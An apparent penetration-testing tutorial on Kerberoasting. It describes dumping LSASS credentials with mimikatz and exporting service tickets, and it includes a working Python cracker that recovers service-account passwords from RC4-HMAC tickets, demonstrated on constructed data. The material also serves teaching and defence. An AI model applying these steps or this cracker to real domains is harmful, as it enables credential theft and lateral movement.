Creating & Cracking TGS
There are a couple of weak points in the Kerberos authentication flow that let an attacker who already has a foothold on a domain-joined host recover credential material: the secrets cached in memory, and the service tickets the KDC hands out to anyone who asks.
Cached Credentials
LSASS (the Local Security Authority Subsystem Service) keeps the user's credential material in memory so that it can renew the TGT from a domain controller without prompting again. Depending on configuration this includes the NT hash, the Kerberos keys and, where the WDigest provider still caches logon credentials, the plaintext password. There is no supported API to read any of it back; recovering it means reading LSASS process memory.
Reading LSASS memory requires local administrator or SYSTEM rights on the target (the debug privilege that administrators hold is what lets a tool attach to the process), so this is a post-compromise step rather than an initial foothold.
mimikatz.exe can extract this material from LSASS. Its credential-dumping commands list the logged-on users together with whatever forms of their credentials are cached: NTLM (NT) hashes and Kerberos keys as a rule, and plaintext passwords only where WDigest caching is enabled (the default before Windows 8.1 / Server 2012 R2, and on older systems without KB2871997). WDigest is a security support provider rather than a hash format; what it contributes is the cleartext.
Listing TGT & Service Tickets
In the same way, mimikatz can list the TGT and service tickets held in the ticket cache and export them.
A ticket can only be exported if it is already in the cache, that is, if a user on that system has requested it from the TGS. If no ticket for the target service exists yet, one can be requested on demand and exported afterwards. Any authenticated domain user may request a service ticket for any SPN registered in the domain; the KDC does not check whether the requester is allowed to use that service, which is what makes this attack possible from an unprivileged account.
From PowerShell a service ticket can be requested for any SPN in this way; the ticket lands in the local ticket cache, and mimikatz can then export every cached ticket into its own .kirbi file.
The exported .kirbi files can be cracked offline with kerberoast. The ticket's encrypted part is encrypted under the service account's long-term key, so the cracker derives that key from each candidate password (for RC4-HMAC tickets the key is simply the account's NT hash), attempts the decryption and stops when the ticket's embedded checksum verifies. What falls out is the service account's password, not the password of the user who requested the ticket, so the realistic targets are service accounts with human-chosen, rarely rotated passwords; machine accounts, whose passwords are long and random, are not crackable this way.
Alternatively, the files can be cracked with john or hashcat:
John
Hashcat
Both tools expect the ticket as a $krb5tgs$ text line rather than the raw .kirbi, so convert the exported files first (kerberoast ships a kirbi-to-john converter; john's krb5tgs format and hashcat mode 13100 both read the resulting lines for RC4-HMAC tickets). AES-encrypted tickets (etypes 17 and 18) need hashcat's separate modes 19600 and 19700 and crack orders of magnitude slower because of the PBKDF2 key derivation, so service accounts that only support AES are far harder targets.
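The cracking step described above, written out as an added example (this is not code from the page or from the kerberoast project): a pure-Python reimplementation of the test that kerberoast's TGS-REP cracker and hashcat mode 13100 perform for every candidate password against an RC4-HMAC (etype 23) ticket. It also ties the two halves of this page together: the NT hash that mimikatz reads out of LSASS is MD4 over the UTF-16LE password, and that same value is the account's RC4-HMAC Kerberos key, which is why a service ticket can be checked against a wordlist offline. The block builds the $krb5tgs$23$ line that the kirbi-to-john conversion produces from a constructed ticket, then recovers the password from a small constructed wordlist. The account name svc_sql, realm CORP.LOCAL, the SPN, the placeholder plaintext, the fixed confounder and the wordlist are all assumptions for the demo, not data from the page.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
KU_TICKET = 2  # RFC 4120 key usage number for the ticket enc-part in an AS-REP/TGS-REP


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib's md4 is missing on many OpenSSL 3 builds."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, n): return ((x << n) | (x >> (32 - n))) & MASK32
    msg = bytearray(data) + b'\x80'
    msg += b'\x00' * ((56 - len(msg)) % 64)
    msg += struct.pack('<Q', (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    rounds = (  # (step function, additive constant, X[] index order, per-position shifts)
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack('<16I', msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rol((a + fn(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: the next step updates the next word
        a0, b0, c0, d0 = ((a0 + a) & MASK32, (b0 + b) & MASK32,
                          (c0 + c) & MASK32, (d0 + d) & MASK32)
    return struct.pack('<4I', a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is also the account's RC4-HMAC Kerberos key."""
    return md4(password.encode('utf-16-le'))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes, usage: int = KU_TICKET) -> bytes:
    """RFC 4757 etype 23 as the KDC applies it: CHECKSUM(16) || RC4(K3, confounder || plaintext)."""
    k1 = hmac.new(key, struct.pack('<I', usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def check_candidate(password: str, checksum: bytes, edata: bytes, usage: int = KU_TICKET) -> bool:
    """The per-guess test kerberoast and hashcat -m 13100 run: derive K1/K3, decrypt, recompute the HMAC."""
    k1 = hmac.new(nt_hash(password), struct.pack('<I', usage), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plaintext = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def to_hashcat(user: str, realm: str, spn: str, cipher: bytes) -> str:
    """Ticket enc-part cipher -> the $krb5tgs$23$ line john and hashcat consume (16-byte checksum first)."""
    return f'$krb5tgs$23$*{user}${realm}${spn}*${cipher[:16].hex()}${cipher[16:].hex()}'


def parse_hashcat(line: str):
    prefix = '$krb5tgs$23$*'
    if not line.startswith(prefix):
        raise ValueError('only etype 23 (RC4-HMAC) lines are handled here; AES tickets use other modes')
    label, _, blob = line[len(prefix):].partition('*$')
    checksum_hex, _, edata_hex = blob.partition('$')
    return label, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack(line: str, wordlist):
    """Return the first wordlist entry whose NT hash decrypts the ticket, or None."""
    _, checksum, edata = parse_hashcat(line)
    return next((guess for guess in wordlist if check_candidate(guess, checksum, edata)), None)


# Constructed demo data, not a captured ticket: the plaintext only stands in for a DER EncTicketPart,
# and the confounder is fixed so the hash line is reproducible (a real KDC uses 8 random bytes).
DEMO_PASSWORD = 'Summer2019!'
DEMO_PLAINTEXT = b'\x63\x81\x40' + bytes(64)
DEMO_CONFOUNDER = bytes(range(8))
DEMO_WORDLIST = ['Welcome1', 'P@ssw0rd', 'Summer2019!', 'Winter2020']


def demo_hash_line(password: str = DEMO_PASSWORD) -> str:
    cipher = rc4_hmac_encrypt(nt_hash(password), DEMO_PLAINTEXT, DEMO_CONFOUNDER)
    return to_hashcat('svc_sql', 'CORP.LOCAL', 'MSSQLSvc/sql01.corp.local:1433', cipher)


if __name__ == '__main__':
    line = demo_hash_line()
    print(line)
    print('recovered password:', crack(line, DEMO_WORDLIST))
```

Running the module prints the constructed hash line and the recovered password. Hashcat and john perform exactly this test, only on a GPU: one MD4, three HMAC-MD5 computations and one RC4 pass per guess, with no salt and no iteration count, which is why RC4-HMAC tickets are the preferred Kerberoasting target and why forcing service accounts onto AES makes the same ticket dramatically more expensive to crack.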